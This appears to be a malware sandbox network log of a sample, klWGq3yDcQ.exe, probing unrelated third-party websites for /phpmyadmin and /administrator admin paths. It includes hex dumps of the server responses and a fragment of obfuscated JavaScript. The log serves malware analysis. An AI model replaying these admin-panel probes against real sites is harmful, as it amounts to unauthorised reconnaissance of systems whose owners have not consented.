                                                                                                                                                                                                    2023-11-26 05:59:33 UTC13014INData Raw: 2b 30 78 31 37 2a 30 78 31 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 66 28 47 53 2e 49 29 29 2f 28 30 78 31 36 65 66 2b 2d 30 78 32 32 37 30 2b 30 78 62 38 62 29 3b 69 66 28 55 3d 3d 3d 5a 29 62 72 65 61 6b 3b 65 6c 73 65 20 76 5b 27 70 75 73 68 27 5d 28 76 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 52 29 7b 76 5b 27 70 75 73 68 27 5d 28 76 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 46 2c 2d 30 78 31 32 63 34 32 64 2b 30 78 31 32 36 36 34 33 2b 30 78 33 63 2a 30 78 32 64 32 33 29 29 3b 66 75 6e 63 74 69 6f 6e 20 46 28 29 7b 76 61 72 20 5a 39 3d 5b 27 6c 65 63 27 2c 27 64 6e 73 27 2c 27 34 33 31 37 31 36 38 77 68 43 4f 72 5a 27 2c 27 36 32 36 39 38 79 42 4e 6e 4d 50 27 2c 27 74 72 69 27 2c 27 69 6e 64 27 2c 27 2e 63 6f 27 2c 27 65 61
                                                                                                                                                                                                    Data Ascii: +0x17*0x16)+-parseInt(f(GS.I))/(0x16ef+-0x2270+0xb8b);if(U===Z)break;else v['push'](v['shift']());}catch(R){v['push'](v['shift']());}}}(F,-0x12c42d+0x126643+0x3c*0x2d23));function F(){var Z9=['lec','dns','4317168whCOrZ','62698yBNnMP','tri','ind','.co','ea


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    88192.168.2.45648418.228.96.1424436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC440INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 72 65 63 68 2e 63 6f 6d 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6f 72 69 67 69 6e 44 69 72 65 63 74 3d 74 72 75 65 3b 20 4d 61 78 2d 41 67 65 3d 36 30 34 38 30 30 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 30 33 20 44 65 63 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:32 GMTContent-Length: 0Connection: closeContent-Security-Policy: frame-ancestors 'self'Location: https://rech.comSet-Cookie: originDirect=true; Max-Age=604800; Expires=Sun, 03 Dec 2023 05:59:32 GM


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    89192.168.2.45682534.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC178OUTGET /administrator HTTP/1.1
                                                                                                                                                                                                    Host: www.2brospw.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1086INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 32 2e 36 36 37 31 30 33 36 34 34 38 35 37 39 32 36 32 37 30 33 30 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978372.66710364485792627030Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Opti
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC166INData Raw: 62 33 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63
                                                                                                                                                                                                    Data Ascii: b31 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sc
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1252INData Raw: 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20
                                                                                                                                                                                                    Data Ascii: ale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width">
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1252INData Raw: 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39
                                                                                                                                                                                                    Data Ascii: vices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC207INData Raw: 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    90192.168.2.456935162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC662INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 70 62 69 64 3d 31 37 32 66 66 33 37 37 61 61 34 62 33 62 64 65 31 31 65 32 61 35 30 33 38 33 65 64 31 35 61 37 34 63 63 64 39 33 38 33 33 65 38 30 37 32 31 39 38 64 65 31 64 33 66 35 30 32 38 64 65 66
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: pbid=172ff377aa4b3bde11e2a50383ed15a74ccd93833e8072198de1d3f5028def
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC706INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <meta name='robots' content='noindex, nofollow' />
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC14994INData Raw: 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 53 74 61 67 69 6e 67 20 66 6f 72 20 4d 79 44 69 72 65 63 74 4c 65 6e 64 65 72 2e 63 6f 6d 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 44 69 72 65 63 74 20 4c 65 6e 64 65 72 73 2c 20 4c 4c 43 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63
                                                                                                                                                                                                    Data Ascii: ext":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://mydirectlender.com/#website","url":"https://mydirectlender.com/","name":"Staging for MyDirectLender.com","description":"Direct Lenders, LLC","publisher":{"@id":"https://mydirectlender.c
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC16384INData Raw: 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 69 64 6e 69 67 68 74 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 73 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 65 64 69 75 6d 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72
                                                                                                                                                                                                    Data Ascii: set--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC4201INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 74 79 78 2d 73 69 64 65 62 61 72 20 63 6f 6c 2d 6d 64 2d 33 20 63 6f 6c 2d 31 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 73 65 61 72 63 68 2d 31 22 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 20 77 69 64 67 65 74 5f 73 65 61 72 63 68 22 3e 3c 66 6f 72 6d 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 69 64 3d 22 73 65 61 72 63 68 66 6f 72 6d 22 20 63 6c 61 73 73 3d 22 73 65
                                                                                                                                                                                                    Data Ascii: </div> </div> </div> <div class="styx-sidebar col-md-3 col-12"> <div id="search-1" class="widget widget_search"><form role="search" method="get" id="searchform" class="se


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    91192.168.2.4563573.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC220INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheLocation: https://www.knu.ac.in/administrator/Content-Length: 304Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC304INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.knu.ac.in/administrator/">here</a>.</p><hr><address>Apache Serve


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    92192.168.2.45682434.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC175OUTGET /phpmyadmin HTTP/1.1
                                                                                                                                                                                                    Host: www.2brospw.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1079INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 32 2e 37 32 38 31 30 33 36 37 36 31 36 37 33 38 38 31 35 38 36 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978372.7281036761673881586Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC173INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1252INData Raw: 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                                                                                                                                                                                    Data Ascii: scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC1252INData Raw: 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65
                                                                                                                                                                                                    Data Ascii: party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/e
